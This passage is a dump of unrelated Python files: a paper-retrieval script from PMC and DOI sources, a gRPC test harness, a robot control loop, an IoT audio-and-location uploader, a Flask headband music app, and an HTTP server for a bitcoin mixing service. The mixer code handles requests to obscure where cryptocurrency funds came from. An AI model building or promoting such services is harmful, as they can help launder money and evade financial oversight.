if xml_d['evaluation'] == 'TP' and (len(xml_d['abstract'].split()) < xml_d['wc'] or len(xml_d['abstract'].split()) > 1000 if xml_d['abstract'] != None else True) and 100 < xml_d['wc']:
print('success, now writing to file')
with open(f'./output/formats/xmls/{index}.xml', 'w') as file:
# saving the file as it has been evaluated as TP
file.write(response_d['text'].encode('ascii', 'ignore').decode())
retrieval_df.loc[index,'xml'] = 1
retrieval_df.loc[index,'xml_parse_d'] = [xml_d]
else:
# in case the status code is different than 200 or 429
print('error with request')
print(f'{response_d["error"]}')
else:
pass
elif stage == 'pmcpdfs':
            # checking whether the pdf is already retrieved for that row; if yes, move to the next record
            # the condition also checks that an identifier is present
if retrieval_df.pdf.loc[index] != 1 and retrieval_df.pmcid.loc[index] == retrieval_df.pmcid.loc[index]:
try:
                    # creating the header and the protocol to request the document from the PMC API
response_d, response = get_request(pmcid, http, base_url, headers, 'pmcpdfs')
except:
pass
#stop the process in case of 429 status code
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
exit()
#status code 200 means everything works perfectly
elif response_d['status_code'] == 200:
# The response for this API is an xml which provides links to the resource
# lets use beautiful soup to parse the xml
soup = BeautifulSoup(response.text)
for link in soup.find_all('link'):
# check for pdf format
if link.attrs['format'] == 'pdf':
print('pdf file available')
# get the link for the pdf
ftp_link = link.get('href')
with closing(request.urlopen(ftp_link)) as r:
detection = r.info().get_content_subtype()
if detection == 'pdf':
with open(f'./output/formats/pdfs/{index}.pdf', 'wb') as f:
shutil.copyfileobj(r, f)
try:
pdf_d = pdf_file_to_parse_d(retrieval_df, index, f'./output/formats/pdfs/{index}.pdf', ftp_link, keep_abstract)
if pdf_d['Content_type'] == 'pdf' and pdf_d['text'] != '' and (len(pdf_d['abstract'].split()) < pdf_d['wc'] or len(pdf_d['abstract'].split()) > 1000 if pdf_d['abstract'] != None else True) and 100 < pdf_d['wc']:
retrieval_df.loc[index, 'pdf'] = 1
retrieval_df.loc[index, 'pdf_parse_d'] = [pdf_d]
else:
pass
except:
pass
else:
pass
# alternative error code, register the fail but keep going.
else:
print('error with request')
print(f'{response_d["error"]}')
pass
else:
pass
elif stage == 'pmctgz':
if retrieval_df.pmc_tgz.loc[index] != 1 and retrieval_df.pmcid.loc[index] == retrieval_df.pmcid.loc[index]:
try:
#creating the header and protocol to request the tgz from PMC
response_d, response = get_request(pmcid, http, base_url, headers, 'pmctgz')
except:
pass
#stop the process in case of status code 429
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
exit()
#if status code 200 means we can process the document
elif response_d['status_code'] == 200:
# The response for this API is an xml which provides links to the resource
# lets use beautiful soup to parse the xml
soup = BeautifulSoup(response.text)
for link in soup.find_all('link'):
# the link could be to a tgz
if link.attrs['format'] == 'tgz':
print('tar zip file available')
ftp_link = link.get('href')
# if it is a tgz then it'll probably need to be written in chunks
out_file = f'./output/formats/tgzs/{index}.tgz'
try:
                            # we had previous experience where the code got stuck on the tgz, so we set a maximum of 300s before moving to the next record without changing the main df
timeout_time = 300
start = time.time()
worked = False
                                # creating one process so we can kill it once the time has passed or when it has completed
pnum = 1
procs = []
for i in range(pnum):
#downloading the tgz using the newly created process that will die at most 300s from the start
p = Process(target=wget.download, args=(ftp_link, out_file), name = ('process_' + str(i+1)))
procs.append(p)
p.start()
                                    # as long as less than 300s have elapsed since we started, continue to try
while time.time() - start <= timeout_time:
                                        # checking whether it has already completed; if yes, stop and move to the next record
if not any([p.is_alive() for p in procs]):
# All the processes are done, break now.
                                            # boolean to record the fact that it worked
worked = True
#altering the main df
retrieval_df.loc[index, 'pmc_tgz'] = 1
                                            # kill the process and merge the result
p.terminate()
p.join()
break
                                        # only check whether it is done once every second
time.sleep(1) # just to avoid bothering the CPU
else:
# We only enter this if we didn't 'break' above.
print("timed out, killing all processes")
for p in procs:
p.terminate()
p.join()
except:
pass
                            # run the function to unpack the tgz, looking for pdfs and xmls, in case the tgz download was successful
if worked == True:
try:
#again using a timeout function to not get stuck in the tgz
retrieval_df = timeout(300)(tgz_unpacking)(index, retrieval_df, f'./output/formats/tgzs/{index}.tgz', ftp_link, keep_abstract)
except:
pass #handle errors
else:
pass
# alternative error code, register the fail but keep going.
else:
print('error with request')
print(f'{response_d["error"]}')
pass
else:
pass
elif stage == 'doiorg':
            # checking that the doi is not nan
if retrieval_df.doi.loc[index] == retrieval_df.doi.loc[index]:
try:
#creating the header and the protocol
response_d, response = get_request(doi, http, base_url, headers, 'doiorg')
except:
pass
# check the response status
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
exit()
elif (response_d['status_code'] == 200):
                # rule of thumb: very short responses are rubbish, so skip anything of 100 bytes or fewer
if (len(response_d['content']) > 100):
# now lets get the format of the doc
if response_d['headers'].get('Content-Type') != None:
format_type = response_d['headers']['Content-Type']
else:
format_type = ''
if format_type == '':
print('No format Type in the headers, trying to extract from soup object')
soup = BeautifulSoup(response_d['text'])
format_type = doctype(soup)
if format_type == None:
format_type = ''
print(f'Format type: {format_type}')
if format_type != None:
print(f'Format:{format_type} found')
                        # execute if we have identified pdf as the format
if 'pdf' in format_type.lower() and retrieval_df.pdf.loc[index] != 1:
if response_d['headers'].get('Content-Type') != None:
                                # the document retrieved is the format we expected
if response_d['headers']['Content-Type'] == 'application/pdf':
with open(f'./output/formats/pdfs/{index}.pdf', 'wb') as file:
file.write(response_d['content'])
try:
pdf_d = pdf_file_to_parse_d(retrieval_df, index, f'./output/formats/pdfs/{index}.pdf', f'{base_url}{doi}', keep_abstract)
if pdf_d['Content_type'] == 'pdf' and pdf_d['text'] != '' and (len(pdf_d['abstract'].split()) < pdf_d['wc'] or len(pdf_d['abstract'].split()) > 1000 if pdf_d['abstract'] != None else True) and 100 < pdf_d['wc']:
                                            # if the content retrieved from the document follows the rules we implemented, we alter the main df
retrieval_df.loc[index, 'pdf'] = 1
retrieval_df.loc[index, 'pdf_parse_d'] = [pdf_d]
else:
pass
except:
pass
else:
pass
else:
pass
elif 'xml' in format_type.lower() and retrieval_df.xml.loc[index] != 1:
# perform xml parsing and FP detection
xml_d = xml_response_to_parse_d(retrieval_df, index, response, keep_abstract)
xml_d = evaluation_funct(xml_d)
# now that we have the xml_d we can decide if it is a TP, FP or AB
if xml_d['evaluation'] == 'TP' and (len(xml_d['abstract'].split()) < xml_d['wc'] or len(xml_d['abstract'].split()) > 1000 if xml_d['abstract'] != None else True) and 100 < xml_d['wc']:
with open(f'./output/formats/xmls/{index}.xml', 'w') as file:
file.write(response_d['text'].encode('ascii', 'ignore').decode())
retrieval_df.loc[index,'xml'] = 1
retrieval_df.loc[index,'xml_parse_d'] = [xml_d]
elif 'html' in format_type.lower() and retrieval_df.html.loc[index] != 1:
# all the htmls should be checked for links regardless of whether they are FP or AB
html_links = complete_html_link_parser(response)
if len(html_links) != 0:
full_text_link_dict = retrieval_df.loc[index, 'full_text_links']
full_text_link_dict.update({'html_parse':html_links})
retrieval_df.at[index, 'full_text_links'] = full_text_link_dict
# perform html parsing and FP detection
html_d = html_response_to_parse_d(retrieval_df, index, response, keep_abstract)
html_d = evaluation_funct(html_d)
# now we have the html_d we can compare to decide if it is a TP, FP or AB
if html_d['evaluation'] == 'TP' and (len(html_d['abstract'].split()) < html_d['wc'] or len(html_d['abstract'].split()) > 1000 if html_d['abstract'] != None else True) and 100 < html_d['wc']:
with open(f'./output/formats/htmls/{index}.html', 'w') as file:
file.write(response_d['text'].encode('ascii', 'ignore').decode())
retrieval_df.loc[index,'html'] = 1
retrieval_df.loc[index,'html_parse_d'] = [html_d]
elif 'plain' in format_type.lower() and retrieval_df.plain.loc[index] != 1:
with open(f'./output/formats/txts/{index}.txt', 'w') as file:
file.write(response_d['text'].encode('ascii', 'ignore').decode())
plain_d = plain_file_to_parse_d(retrieval_df, index, f'./output/formats/txts/{index}.txt', f'{base_url}{doi}', keep_abstract)
if plain_d['text'] != '' and (len(plain_d['abstract'].split()) < plain_d['wc'] or len(plain_d['abstract'].split()) > 1000 if plain_d['abstract'] != None else True) and 100 < plain_d['wc']:
retrieval_df.loc[index, 'plain_parse_d'] = [plain_d]
retrieval_df.loc[index,'plain'] = 1
# if no format then fail this index
else:
pass
                # if the doc is too short then fail this index
else:
pass
# if response status not 200 then fail this index
else:
pass
else:
pass
######################################### Pubmed PMID request and link extraction ####################################
######################################### ####################################
# This stage sends a get request using a pmid to PUBMED to try and get the Full text links from the html page 'linkout' section
# we don't need to save the page, just parse the request.text and save the links to the retrieved df
    # no html pages are saved at this stage, only candidate links
elif stage == 'pubmed':
# firstly check that there is a PMID to use (is equal to itself)
if retrieval_df.pmid.loc[index] == retrieval_df.pmid.loc[index]:
# set the conditions for when to try (No Tagged version (HTML or XML) or no PDF)
if ((retrieval_df.html.loc[index] == 0) and (retrieval_df.xml.loc[index] == 0)) or (retrieval_df.pdf.loc[index]) == 0:
# send the request to pubmed using the base url and pmid
try:
response_d, response = get_request(pmid, http, base_url, headers, 'pubmed')
except:
pass
                # check the response code
if response_d['status_code'] == 429:
print('"Too many requests error [429]" received')
print('Risk of IP address block: stopping script')
exit()
elif response_d['status_code'] == 200:
# if the response code is 200 then we can parse out the links from linkout section using our function above.
retrieval_df = pubmed_linkout_parse(index, retrieval_df, response)
else:
# we already have all the required versions, no need to try the pubmed route
pass
else:
# we don't have a pmid so no point in trying this option
pass
######################################### Pubmed PMID request and link extraction ####################################
######################################### ####################################
else:
pass
print('\nnext record\n')
if counter%10 == 0 and not counter%100 == 0 and not counter == 0:
#clearing the terminal output every 10 records, showing on top of the terminal the information in case of failure
#resting 2 seconds every 10 records to be polite
sleep(2)
clear()
        print(f'In case of failure please put the parameters start="{saved_stage}" (or "{saved_stage}_only" if in only mode) and idx="{saved_index}"')
print('\n')
elif counter%100 == 0 and not counter == 0:
#saving the main df every 100 records, updating the information on the top in case of failure
#resting 2 seconds to be polite
sleep(2)
clear()
saved_stage = stage
saved_index = index
if done is None:
pickle.dump(retrieval_df, open(f'./output/retrieved_df/retrieved_df.p', 'wb'))
else:
saved_processed_df = pd.concat([done, retrieval_df], axis=0, join='outer', ignore_index=False, copy=True)
pickle.dump(saved_processed_df, open(f'./output/retrieved_df/retrieved_df.p', 'wb'))
        print(f'In case of failure please put the parameters start="{saved_stage}" (or "{saved_stage}_only" if in only mode) and idx="{saved_index}"')
print('\n')
    # when all the rows have been completed, save the main df and the information for the current stage
print('process Complete')
if done is None:
pickle.dump(retrieval_df, open(f'./output/retrieved_df/retrieved_df.p', 'wb'))
else:
saved_processed_df = pd.concat([done, retrieval_df], axis=0, join='outer', ignore_index=False, copy=True)
pickle.dump(saved_processed_df, open(f'./output/retrieved_df/retrieved_df.p', 'wb'))
return retrieval_df
|
test_case.py
|
import asyncio
import datetime
import logging
import threading
import unittest
from asyncio import Queue as AsyncQueue
from time import sleep
from typing import Any, Dict
import grpc
import grpc_testing
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID
from . import App, AsyncApp, AsyncServer, Server, Service
class HomiTestCase(unittest.TestCase):
app: App = None
_test_server = None
def get_test_server(self):
if not self._test_server:
servicers = {}
for svc in self.app.services:
if isinstance(svc, Service):
servicers[svc.descriptor] = svc.make_servicer_class()
self._test_server = grpc_testing.server_from_dictionary(
servicers, grpc_testing.strict_real_time()
)
return self._test_server
@staticmethod
def get_all_response(method):
finish = False
result = []
while not finish:
try:
result.append(method.take_response())
except Exception:
finish = True
return result
@staticmethod
def send_request_all(method, requests):
[method.send_request(req) for req in requests]
method.requests_closed()
class HomiRealServerTestCase(unittest.TestCase):
app = None
default_server_config = {
"host": "localhost",
"port": '5999'
}
alts = False
tls = False
_tls_key = None
_certificate = None
test_server_config: Dict[str, Any] = {}
test_server = None
@property
def tls_key(self):
if not self._tls_key:
self._tls_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
return self._tls_key
@property
def certificate(self):
if not self._certificate:
subject = issuer = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, "US"),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"California"),
x509.NameAttribute(NameOID.LOCALITY_NAME, "San Francisco"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, "My Company"),
x509.NameAttribute(NameOID.COMMON_NAME, "localhost"),
])
self._certificate = x509.CertificateBuilder() \
.subject_name(subject) \
.issuer_name(issuer) \
.public_key(self.tls_key.public_key()) \
.serial_number(x509.random_serial_number()) \
.not_valid_before(datetime.datetime.utcnow()) \
.not_valid_after(
# Our certificate will be valid for 10 days
datetime.datetime.utcnow() + datetime.timedelta(days=10)
) \
.add_extension(x509.SubjectAlternativeName([x509.DNSName("localhost")]),
critical=False, ).sign(self.tls_key, hashes.SHA256())
return self._certificate
@property
def channel_credentials(self):
if self.alts:
return grpc.alts_channel_credentials()
elif self.tls:
cert = self.certificate.public_bytes(serialization.Encoding.PEM)
return grpc.ssl_channel_credentials(cert)
return None
@property
def tls_config(self):
if not self.tls:
return {}
else:
return {
"private_key": self.tls_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption(),
),
"certificate": self.certificate.public_bytes(serialization.Encoding.PEM),
}
def get_server_config(self, merge_config: dict = None):
config = merge_config or {}
return {
**self.default_server_config,
**self.test_server_config,
**self.tls_config,
**config,
}
def server_restart(self, merge_config: dict = None):
self.run_real_server(merge_config)
def _run_async_server(self, config):
self.test_server = AsyncServer(self.app, **self.get_server_config(config))
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.que = AsyncQueue()
def run_server(loop, server, q):
async def operator(server, q):
await server.run(wait=False)
await q.get()
await server.stop()
logging.debug('test server stopped')
loop.run_until_complete(operator(server, q))
self.thread = threading.Thread(target=run_server, args=(self.loop, self.test_server, self.que))
self.thread.start()
        # todo: find a way to wait until the server is actually up
sleep(0.02)
def run_real_server(self, merge_config: dict = None):
config = merge_config or {}
if self.test_server:
try:
self.test_server.stop()
except Exception:
pass
if isinstance(self.app, AsyncApp):
self._run_async_server(config)
else:
self.test_server = Server(self.app, **self.get_server_config(config))
self.test_server.run(wait=False)
def setUp(self):
super().setUp()
self.run_real_server()
def server_stop(self):
if isinstance(self.app, AsyncApp):
self.loop.call_soon_threadsafe(self.que.put_nowait, 'stop')
self.thread.join()
del self.thread
self.loop.run_until_complete(self.loop.shutdown_asyncgens())
self.loop.close()
else:
self.test_server.stop()
def tearDown(self):
super().tearDown()
self.server_stop()
|
depart.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import pypot.robot
import time
import json
import math
import sys
import threading
import queue
from serial import Serial
def dist(a,b):
return math.sqrt((a*a)+(b*b))
def get_y_rotation(x,y,z):
radians = math.atan2(x, dist(y,z))
return -math.degrees(radians)
def get_x_rotation(x,y,z):
radians = math.atan2(y, dist(x,z))
return math.degrees(radians)
def read_kbd_input(inputQueue):
print('Ready for keyboard input:')
while True:
inputQueue.put(sys.stdin.read(1))
def interp(a, x1, x2):
return x1+a*(x2-x1)
def interpInv(x, x1, x2):
return (x-x1)/(x2-x1)
def MGD(theta2):
c = math.cos(theta2)
s = math.sin(theta2)
xA = 0.025
yA = 0.045
xB = 0.095
yB = 0.000
L2 = 0.130
L3 = 0.055
L4 = 0.122
L5 = 0.140
xC = xB+L2*c
yC = yB+L2*s
AC = math.sqrt((xA-xC)**2+(yA-yC)**2)
AH = min((L4**2-L3**2+AC**2)/(2*AC),L4)
HD = math.sqrt(L4**2-AH**2)
xH = xA+AH*(xC-xA)/AC
yH = yA+AH*(yC-yA)/AC
xD = xH-HD*(yC-yA)/AC
yD = yH+HD*(xC-xA)/AC
xF = xC+L5*(xC-xD)/L3
yF = yC+L5*(yC-yD)/L3
return math.atan((yF-yC)/(xF-xC))*180.0/math.pi, math.atan(yF/xF)*180.0/math.pi
lapin = pypot.robot.from_json('confLapinMarkII.json')
PS = Serial('/dev/ttyAMA0',115200,timeout=0.1)
PS.flushInput()
info = {}
alpha = 0 # positive when the legs spread apart
theta = 0 # negative towards the front
aLc = 0 # rest at -40, extension at 30
aRc = 0 # rest at -40, extension at 30
compliant = True
speed = 100
state = 0
xLeft=0
xRight=0
KP = 10
KI = 5
rythme=1
srythme=10
inputQueue = queue.Queue()
inputThread = threading.Thread(target=read_kbd_input, args=(inputQueue,), daemon=True)
inputThread.start()
count = 0
last_update = time.time()
t0 = time.time()
while True:
if (inputQueue.qsize() > 0):
c = inputQueue.get()
if c=='q':
break
if c=='a':
state = -1
    # measurements
    # temperature measurement
temp = 0
for mot in lapin.motors:
temp = max(temp, mot.present_temperature)
if temp >60:
print("HOT!")
    # measurement of the linkage (quadrilateral) angle
aLm = interpInv(lapin.l_knee_y.present_position, -40, 30)
aRm = interpInv(lapin.r_knee_y.present_position, -40, 30)
    # reading the sensors
PS.write(b"A")
out = PS.readline()
try:
info = json.loads(out)
except:
pass
print(str(temp)+'°C\t'+str(state))
print(lapin.l_ankle_y.present_position)
if info["RF"]["F"]+info["RB"]["F"]+info["LF"]["F"]+info["LB"]["F"]>40:
rbalance = (info["RF"]["F"]+info["RB"]["F"])/(info["RF"]["F"]+info["RB"]["F"]+info["LF"]["F"]+info["LB"]["F"])
else:
rbalance=0.5
roll = info["GYR"]["X"]
print("rbalance: "+str(rbalance))
print(info["GYR"])
    # state machine
if state == 0:
alpha = 10
theta = 0
aLc = 0.9
aRc = 0.9
speed = 10
compliant = False
if time.time()-t0 > 10:
t0 = time.time()
state = 1
elif state == 1:
alpha = 10
theta = 0
aLc = 0.9
aRc = 0.8
speed = 3
compliant = False
if time.time()-t0 > 10:
t0 = time.time()
state = 2
elif state == 2:
alpha = 10
theta = 0
aLc = 0.5
aRc = 0.8
speed = 100
compliant = False
if time.time()-t0 > 5:
t0 = time.time()
state = 0
elif state == -1:
alpha = 0
theta = 0
aLc = 0.5
aRc = 0.5
speed = 10
compliant = True
    # actuators
(aFr,lFr) = MGD((70-lapin.r_knee_y.present_position)*math.pi/180.0)
(aFl,lFl) = MGD((70-lapin.l_knee_y.present_position)*math.pi/180.0)
lapin.r_hip_x.pid = (KP,KI,0)
lapin.r_hip_x.compliant = compliant
lapin.r_hip_x.goal_position = alpha/2
lapin.r_hip_x.moving_speed = speed
lapin.l_hip_x.pid = (KP,KI,0)
lapin.l_hip_x.compliant = compliant
lapin.l_hip_x.goal_position = alpha/2
lapin.l_hip_x.moving_speed = speed
lapin.r_hip_y.compliant = compliant
lapin.r_hip_y.goal_position = -lFr-theta/2
lapin.r_hip_y.moving_speed = 0
lapin.l_hip_y.compliant = compliant
lapin.l_hip_y.goal_position = -lFl+theta/2
lapin.l_hip_y.moving_speed = speed
lapin.r_knee_y.pid = (KP,KI,0)
lapin.r_knee_y.compliant = compliant
lapin.r_knee_y.goal_position = interp(aRc, -40, 30)
lapin.r_knee_y.moving_speed = speed
lapin.l_knee_y.pid = (KP,KI,0)
lapin.l_knee_y.compliant = compliant
lapin.l_knee_y.goal_position = interp(aLc, -40, 30)
lapin.l_knee_y.moving_speed = speed
lapin.r_ankle_y.compliant = compliant
lapin.r_ankle_y.goal_position = aFr-lFr-0
lapin.r_ankle_y.moving_speed = speed
lapin.l_ankle_y.compliant = compliant
lapin.l_ankle_y.goal_position = aFl-lFl-0
lapin.l_ankle_y.moving_speed = speed
time.sleep(0.005)
for mot in lapin.motors:
mot.compliant = True
time.sleep(0.04)
lapin.close()
|
audio_service.py
|
import os
import re
import time
import wave
import commons
import pyaudio
import multiprocessing
import network_service as nS
def search_device():
pa = pyaudio.PyAudio()
audio_device = None
# for i in range(0, pa.get_device_count()):
# print(pa.get_device_info_by_index(i))
for i in range(0, pa.get_device_count()):
deviceName = pa.get_device_info_by_index(i)['name']
deviceInputChannels = pa.get_device_info_by_index(i)['maxInputChannels']
isUSBDevice = re.search(".USB.", str(deviceName)) #regex
isUSBDevice = isUSBDevice or re.search("USB.", str(deviceName)) #regex
if isUSBDevice and deviceInputChannels != 0:
print("[INFO] The index of USB Audio Device is ", i)
print("[INFO] Device's information: ", pa.get_device_info_by_index(i))
audio_device = i
break
if audio_device is None:
print("[ERROR] The USB sound card is missing")
return None
isSupported = pa.is_format_supported(rate=commons.rate,
input_device=audio_device,
input_channels=commons.channels,
input_format=commons.format)
if isSupported:
print("[INFO] The device support recording.")
return audio_device
else:
print("[INFO] The device does not support recording.")
return None
def aduio_service(audio_device, serial_dict, sock, sock_lock):
recordProcess = multiprocessing.Process(target=record_audio, args=(audio_device, serial_dict, sock, sock_lock))
if __name__ == '__main__':
recordProcess.start()
else:
return recordProcess
def record_audio(audio_device, serial_dict, sock, sock_lock):
pa = pyaudio.PyAudio()
stream = pa.open(rate=commons.rate,
channels=commons.channels,
format=commons.format,
input=True,
input_device_index=audio_device,
frames_per_buffer=commons.chunk)
print("[INFO] Aduio device open success.Begin to record.")
while True:
print("[INFO] Audio recording.")
file_name = time.strftime("%Y%m%d%H%M%S", time.localtime()) + ".wav"
file_path = commons.cache + file_name
shell = 'arecord -D "plughw:1,0" -t wav -c 1 -f S16_LE -r 48000 -d 5 '
shell += file_path
        print(os.popen(shell).read())  # read() waits for arecord to finish before the file is used
# frames = []
# for i in range(0, int(commons.rate / commons.chunk * commons.rec_seconds)):
# data = stream.read(commons.chunk, exception_on_overflow=False)
# frames.append(data)
print("[INFO] Recording end.")
# stream.stop_stream()
# stream.close()
# pa.terminate()
# wf = wave.open(file_path, 'wb')
# wf.setnchannels(commons.channels)
# wf.setsampwidth(pa.get_sample_size(commons.format))
# wf.setframerate(commons.rate)
# wf.writeframes(b''.join(frames))
# wf.close()
# Send audio to server
print("[INFO] Send audio to server.")
json_msg = {
"Action": "Audio",
"ID": file_name[0:14],
"From": "IOT",
"Lng": str(serial_dict['LNG'] / 1000000),
"Lat": str(serial_dict['LAT'] / 1000000),
"Heart": str(serial_dict['RATE']),
"File": file_name
}
sock_lock.acquire()
nS.send_msg(sock, json_msg)
sock_lock.release()
os.remove(file_path)
|
server.py
|
# server.py
# Run http server for bitcoin mixing service
#
# HingOn Miu
# https://docs.python.org/3/library/http.server.html
import io
import random
import string
import json
import time
import socket
import threading
from socketserver import ThreadingMixIn
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse
import mixing_service
# sample http GET url for bitcoin mixing request
# http://127.0.0.1:9000/api?destination_amount=123&destination_address=ABCDEFG&refund_address=ABCDEFG
# api endpoint following base url
API_endpoint = "/api"
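# A hedged client-side sketch for the endpoint above (not part of this server; the amount
# and addresses are placeholders, and the `requests` package is assumed to be available):
#
#   import requests
#   resp = requests.get("http://127.0.0.1:9000/api", params={
#       "destination_amount": "0.5",
#       "destination_address": "1ExampleExampleExampleExampleXXXX",
#       "refund_address": "1ExampleExampleExampleExampleXXXX",
#   })
#   print(resp.text)  # JSON with deposit_amount/deposit_address, or an error message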
class Handler(BaseHTTPRequestHandler):
# handle http GET requests
def do_GET(self):
print("GET: " + self.path)
# url parameters
parameters = {
"destination_amount": 0, # exact bitcoin amount to be deposited after mixing
"destination_address": 0, # bitcoin address to deposit destination_amount
"refund_address": 0 } # refund bitcoin address if mixing service goes wrong
# parse url path
parsed_path = urlparse(self.path)
# check if API endpoint
if parsed_path.path != API_endpoint:
self.send_error(404)
return
# parse query
query = parsed_path.query.split("&")
# check each query
for q in query:
# check if format is "A=B"
kv = q.split("=")
if len(kv) != 2:
self.send_error(400)
return
k, v = kv
#print(k)
#print(v)
# check if query is a valid parameter
if k not in parameters:
self.send_error(400)
return
# store value to parameter
parameters[k] = v
# check if any parameter is missing
for v in parameters.values():
if v == 0:
self.send_error(400)
return
destination_amount = parameters["destination_amount"]
destination_address = parameters["destination_address"]
refund_address = parameters["refund_address"]
# check if bitcoin amount is float
try:
float(destination_amount)
except ValueError:
self.send_error(400)
return
# check bitcoin address format
if (len(destination_address) < 26 or len(destination_address) > 35 or
len(refund_address) < 26 or len(refund_address) > 35):
self.send_error(400)
return
print("destination_amount: " + destination_amount)
print("destination_address: " + destination_address)
print("refund_address: " + refund_address)
# create mixing service that eventually send destination_amount to destination_address
# user should first pay service_bill to service_address for mixing service to begin
service_bill, service_address = \
mixing_service.create_service(float(destination_amount), destination_address, refund_address)
self.send_response(200)
self.send_header("Content-Type", "text/plain; charset=utf-8")
self.end_headers()
# request bitcoin amount cannot be handled
if service_bill == 0.0:
message = json.dumps({"error": "destination_amount exceeds service maximum limit"})
else:
message = json.dumps({"deposit_amount": service_bill, "deposit_address": service_address})
self.wfile.write(message.encode('utf-8'))
self.wfile.write(b'\n')
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
pass
if __name__ == "__main__":
HOST, PORT = "localhost", 9000
# create server
server = ThreadedHTTPServer((HOST, PORT), Handler)
    # start the server thread to handle requests; the server spawns a new thread for each incoming request
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
print("Server thread ready to handle http requests...")
# run main loop of mixing service to monitor all mixing orders
mixing_service.loop_service()
# clean up server
server.shutdown()
server.server_close()
|
main.py
|
# coding: UTF-8
import sys
import time
import itertools
import json
import numpy as np
from numpy.fft import fft
from collections import deque
import threading as th
import flask as fl
from flask import Flask, render_template, request, Response, redirect, url_for
from server import MuseServer
from search_yt_by_word import Search
from detect_movement import pravila
app = Flask(__name__)
calculatedBeat = 0
mainLock = th.RLock()
search = Search()
currentSong = ""
yt_id = ""
itunes_link = ""
acc_data_num = 0
dq = deque()
headLock = th.RLock()
stopserve = False
stopserveLock = th.Lock()
def serve():
global calculatedBeat, currentSong, yt_id, itunes_link, stopserve
print("Starting server!!!")
t = 5
# time.sleep(t)
while 1:
stopserveLock.acquire()
if stopserve:
stopserve = False
stopserveLock.release()
print("Returning server1")
return
stopserveLock.release()
acc_data_num = 0
for i in range(10):
stopserveLock.acquire()
if stopserve:
stopserve = False
stopserveLock.release()
print("Returning server2")
return
stopserveLock.release()
server.acc_lock.acquire()
tmp = list(zip(*server.acc_list))
raw_tmp = tmp[:]
server.acc_lock.release()
n2 = len(tmp)
tmp = tmp[acc_data_num:]
acc_data_num = n2
podatki = pravila(raw_tmp, duration=t/10)
headLock.acquire()
if "ndesno" in podatki:
dq.append("ndesno")
headLock.release()
time.sleep(t / 10.0)
server.acc_lock.acquire()
tmp = list(zip(*server.acc_list))
server.acc_list = []
server.acc_lock.release()
if tmp and tmp[0]:
size = len(tmp[0])
fs = [i / t for i in range(size // 2)]
tmp = [np.array(x) - sum(x) / len(x) for x in tmp]
acc_fft = [fft(x)[: size // 2] for x in tmp]
imax = [sorted(enumerate(x), key=lambda k: abs(k[1]))[-1] for x in acc_fft]
print(fs[imax[0][0]], fs[imax[0][0]] * 60)
mainLock.acquire()
calculatedBeat = fs[imax[0][0]] * 60
local_beat = calculatedBeat
mainLock.release()
search_result = search.search_all(local_beat)
mainLock.acquire()
currentSong, yt_id, itunes_link = search_result
mainLock.release()
ser = th.Thread(target=serve)
@app.route('/restart')
def restart():
print("restarting serve")
global calculatedBeat, yt_id, ser, stopserve, server
mainLock.acquire()
calculatedBeat = 0
yt_id = ""
search.clear()
mainLock.release()
server.acc_lock.acquire()
server.acc_list = []
server.acc_lock.release()
stopserveLock.acquire()
stopserve = True
stopserveLock.release()
while True:
stopserveLock.acquire()
local = stopserve
stopserveLock.release()
if not local:
ser = th.Thread(target=serve)
ser.start()
break
return "100"
@app.route('/getnext')
def getnext():
print("bpm")
bpm = int(request.args.get("bpm", 80))
print("bpm2")
    try:
        search_result = search.search_all(bpm)
    except Exception as e:
        print(e)
        # without a search result there is nothing meaningful to return
        return "{}\n\n"
    print(search_result)
    song, yt, itunes = search_result
return "{\"bpm\": %d, \"song\": \"%s\", \"yt_id\": \"%s\", " \
"\"itunes_link\": \"%s\"}\n\n" % (bpm, song, yt, itunes)
@app.route('/')
def index():
global calculatedBeat, yt_id
mainLock.acquire()
calculatedBeat = 0
yt_id = ""
search.clear()
mainLock.release()
return render_template('index.html')
@app.route('/status')
def status():
def events():
while 1:
server.senstate_lock.acquire()
event = server.senstate
server.senstate_lock.release()
if event:
yield "event: status\ndata: %s\n\n" % (json.dumps(event))
time.sleep(0.2) # an artificial delay
return Response(events(), content_type='text/event-stream')
@app.route('/headswipe')
def headswipe():
def events():
while 1:
headLock.acquire()
event = len(dq) and dq.pop()
dq.clear()
headLock.release()
if event != 0:
print("head")
yield "event: head\ndata: %s\n\n" % (event)
time.sleep(0.1) # an artificial delay
return Response(events(), content_type='text/event-stream')
@app.route('/blink')
def blink():
def events():
while 1:
server.blink_lock.acquire()
event = len(server.blink_list) and server.blink_list.pop()
server.blink_lock.release()
if event != 0:
yield "event: blink\ndata: %s\n\n" % (event)
time.sleep(0.05) # an artificial delay
return Response(events(), content_type='text/event-stream')
@app.route('/jaw')
def jaw():
def events():
while 1:
server.jaw_lock.acquire()
event = len(server.jaw_list) and server.jaw_list.pop()
server.jaw_lock.release()
if event != 0:
yield "event: jawclench\ndata: %s\n\n" % (event)
time.sleep(0.05) # an artificial delay
return Response(events(), content_type='text/event-stream')
@app.route('/bpm')
def bpm():
def events():
while 1:
mainLock.acquire()
tmpCalculatedBeat = calculatedBeat
mainLock.release()
if tmpCalculatedBeat != 0 and yt_id != "" and currentSong != "":
yield "event: calculated\ndata: {\"bpm\": %d, \"song\": \"%s\", \"yt_id\": \"%s\", \"itunes_link\": \"%s\"}\n\n" % (tmpCalculatedBeat, currentSong, yt_id, itunes_link)
server.acc_lock.acquire()
tmpMove = 0
if server.acc_list and server.acc_list[-1]:
tmpMove = server.acc_list[-1][0]
server.acc_lock.release()
if tmpMove != 0:
